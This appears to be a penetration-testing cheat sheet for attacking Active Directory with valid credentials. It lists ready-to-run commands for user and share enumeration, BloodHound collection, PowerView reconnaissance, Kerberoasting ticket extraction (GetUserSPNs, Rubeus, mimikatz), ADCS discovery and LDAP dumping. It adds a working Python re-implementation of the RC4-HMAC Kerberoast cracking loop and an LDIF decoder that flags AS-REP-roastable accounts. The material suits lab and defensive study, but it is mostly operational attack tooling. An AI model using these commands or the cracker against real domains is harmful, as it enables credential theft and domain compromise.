
Valid Credentials

Get all the users

GetADUsers.py -all -dc-ip <dc-ip> <domain>/<username>:<password>
cme smb <ip> -u <user> -p <password> --users

cme smb <ip> -u <user> -p <password> --users | awk '{print $5}' | grep -v '\[' | grep -v '-Username-'
rpcclient -U <user> <ip>
rpcclient $> enumdomusers
Get-LocalUser    (local accounts on the current host only, not domain users)
python3 windapsearch.py --dc-ip <dc-ip> -u <user> -p <password> -U    (-U lists all users; --da lists only Domain Admins members, -G the groups)

Enumerate SMB Shares

cme smb <ip> -u <user> -p <password> --shares

BloodHound

bloodhound-python -d <domain> -u <user> -p <password> -ns <dc-ip> -c all
./rusthound -d <domain> -u '<user>@<domain>' -p <password> -o <outfile> -z
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain <domain>
.\SharpHound.exe -c All -d <domain>

PowerView

Get Domain Information

Get-NetDomain

Get User List

Get-NetUser

Get a specific User

Get-NetUser "user"

Enumerate Last Password Change and Last Logon

Get-NetUser | select cn,pwdlastset,lastlogon

Get Groups

Get-NetGroup

Get a specific Group

Get-NetGroup "Domain Admins"

List Domain Shares

Find-DomainShare

Get Computers

Get-NetComputer | select operatingsystem,dnshostname

Check on which computers the current user is local admin

Find-LocalAdminAccess

Check for Logged Users

Get-NetSession -ComputerName files04 -Verbose
.\PsLoggedon.exe \\<computer>

Enumerate ACL

Get-ObjectAcl -Identity "user"

Kerberoasting

Get Kerberoastable users

Get-DomainUser -SPN -Properties SamAccountName,ServicePrincipalName

BloodHound Cypher queries (Neo4j console or the raw query box): all accounts with an SPN, and the shortest paths from those accounts to any computer

MATCH (u:User {hasspn:true}) RETURN u
MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

Get Hash

GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
mimikatz # base64 /out:true
mimikatz # kerberos::list /export    (writes the cached TGS tickets as .kirbi files; convert them with kirbi2john before cracking)
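What the cracker actually does with a $krb5tgs$23$ line is worth seeing once. The following is an added example, my own code rather than anything from this page or from impacket, hashcat or Rubeus: it re-implements the RC4-HMAC (etype 23, RFC 4757) check that hashcat mode 13100 performs for each candidate password (NT hash of the candidate, K1 = HMAC-MD5(NT, usage 2), K3 = HMAC-MD5(K1, checksum), RC4-decrypt, recompute the HMAC and compare). MD4 is implemented inline because hashlib's md4 is frequently unavailable on OpenSSL 3 builds. The service account, realm, SPN, ticket body and wordlist are constructed for the demonstration; the hash line is built with the same encryption so the crack loop can be verified offline.

```python
"""Offline verification of a Kerberoast (etype 23, RC4-HMAC) TGS hash line."""
import hmac
import re
import struct
from hashlib import md5

_M = 0xFFFFFFFF
_TGS_REP_TICKET_USAGE = 2  # key usage for the ticket enc-part in a TGS-REP (RFC 4120)


def _md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320), little-endian like MD5."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & _M
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _M, (b + bb) & _M, (c + cc) & _M, (d + dd) & _M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC Kerberos key."""
    return _md4(password.encode("utf-16-le"))


def _rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757 encrypt: checksum (16 bytes) || RC4(K3, plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, plaintext)
    return checksum + _rc4(_hmac_md5(k1, checksum), plaintext)


def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """Decrypt with a candidate key and check the integrity tag: the crack test."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plaintext = _rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


# hashcat 13100 layout: $krb5tgs$23$*user$REALM$spn*$checksum$edata
_HASH_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$")


def build_krb5tgs_hash(user, realm, spn, password, ticket_plaintext) -> str:
    """Emit the hash line a Kerberoast tool would print (used here to make a test vector)."""
    blob = rc4_hmac_encrypt(nt_hash(password), _TGS_REP_TICKET_USAGE, ticket_plaintext)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_krb5tgs(hash_line: str, wordlist):
    """Return the wordlist entry whose NT hash decrypts the ticket, or None."""
    m = _HASH_RE.match(hash_line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ hash line")
    checksum, edata = bytes.fromhex(m["checksum"]), bytes.fromhex(m["edata"])
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), _TGS_REP_TICKET_USAGE, checksum, edata):
            return candidate
    return None


# Constructed sample: 8-byte confounder + a stand-in for the ASN.1 EncTicketPart.
SAMPLE_TICKET = b"\x00" * 8 + b"EncTicketPart for MSSQLSvc/sql01.corp.local (constructed)"
SAMPLE_HASH = build_krb5tgs_hash("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                                 "Summer2024!", SAMPLE_TICKET)
SAMPLE_WORDLIST = ["Password1", "Welcome1", "Summer2024!", "P@ssw0rd"]

if __name__ == "__main__":
    print(SAMPLE_HASH[:64] + "...")
    print("cracked:", crack_krb5tgs(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The cost per candidate is one MD4, three HMAC-MD5s and one RC4 pass over the ticket, which is why etype 23 tickets crack so fast and why a service account that still has an RC4 key and a weak password is the usual Kerberoast win; AES-only (etype 17/18) tickets need the far slower PBKDF2-based key derivation.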

Hash Cracking

ADCS Enumeration

certipy-ad find -username 'user' -password 'password' -dc-ip <IP>
netexec ldap domain.lab -u username -p password -M adcs

Active Directory Certificate Services (AD CS)

Exploit

If enumeration turned up known vulnerabilities, exploit them to compromise more systems:

Known Vulnerabilities

Connect to computers

Lateral Move

WinPeas

Upload WinPEAS for more in-depth local enumeration of the compromised host.

LDAP

ldapsearch -x -H ldap://<dc-ip> -D '<user>@<domain>' -w '<password>' -b "dc=support,dc=htb" "*"

(-x forces a simple bind, which takes the cleartext password, not a hash; -b is the base DN of the domain, dc=support,dc=htb in this example; "*" returns all user attributes of every object.)
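The raw dump is only half useful: pwdLastSet and lastLogon come back as Windows FILETIME integers and userAccountControl as a bitmask. The following is an added example, my own code rather than the page's, that parses ldapsearch-style LDIF (including "::" base64 values and folded lines) and decodes those attributes into something readable, flagging the DONT_REQ_PREAUTH and DONT_EXPIRE_PASSWORD bits that matter for AS-REP roasting and password-age reasoning. The LDIF below is constructed in the shape ldapsearch prints, not real output from any host.

```python
"""Decode pwdLastSet / lastLogon / userAccountControl out of ldapsearch LDIF output."""
import base64
from datetime import datetime, timedelta, timezone

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_NEVER = (0, 0x7FFFFFFFFFFFFFFF)  # AD uses both values to mean "never"

# userAccountControl bits worth noticing during enumeration
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",  # AS-REP roastable
}


def filetime_to_datetime(value: int):
    """100-ns ticks since 1601-01-01 UTC -> aware datetime, or None for 'never'."""
    if value in _NEVER:
        return None
    return _FILETIME_EPOCH + timedelta(microseconds=value // 10)


def decode_uac(value: int):
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def parse_ldif(text: str):
    """Minimal LDIF reader: entries are blank-line separated, '#' lines are comments,
    'attr:: xxx' is base64, and a leading space continues the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:  # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, val = line.partition(":")
        if val.startswith(":"):
            val = base64.b64decode(val[1:].strip()).decode("utf-8", "replace")
        else:
            val = val.strip()
        current.setdefault(attr, []).append(val)
    return entries


def summarize_users(ldif_text: str):
    """Per sAMAccountName: decoded timestamps, UAC flags and any SPNs."""
    report = {}
    for e in parse_ldif(ldif_text):
        if "sAMAccountName" not in e:
            continue  # skips the trailing 'search: / result:' block
        report[e["sAMAccountName"][0]] = {
            "pwdLastSet": filetime_to_datetime(int(e.get("pwdLastSet", ["0"])[0])),
            "lastLogon": filetime_to_datetime(int(e.get("lastLogon", ["0"])[0])),
            "flags": decode_uac(int(e.get("userAccountControl", ["0"])[0])),
            "spn": e.get("servicePrincipalName", []),
        }
    return report


# Constructed sample in the shape ldapsearch prints (not real output).
SAMPLE_LDIF = """\
# extended LDIF
#
dn: CN=svc_sql,OU=Service Accounts,DC=support,DC=htb
sAMAccountName: svc_sql
description:: QmFja3VwIGFjY291bnQ=
userAccountControl: 66048
pwdLastSet: 133485408000000000
lastLogon: 0
servicePrincipalName: MSSQLSvc/sql01.support.htb:1433
servicePrincipalName: MSSQLSvc/sql01.support.htb

dn: CN=j.doe,CN=Users,DC=support,DC=htb
sAMAccountName: j.doe
userAccountControl: 4260352
pwdLastSet: 133485408000000000
lastLogon: 0

# search result
search: 2
result: 0 Success
"""

if __name__ == "__main__":
    for user, info in summarize_users(SAMPLE_LDIF).items():
        print(user, info)
```

Run it against a real dump by piping ldapsearch output into a file and passing the text to summarize_users; lastLogon is per domain controller and not replicated, so a 0 here only means that particular DC never authenticated the user (lastLogonTimestamp is the replicated, coarser value).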

Change User Password

If a user's login fails with "STATUS_PASSWORD_MUST_CHANGE", the password has expired; we can set a new one over SMB with smbpasswd (the old password is required):

smbpasswd -r <ip> -U <username>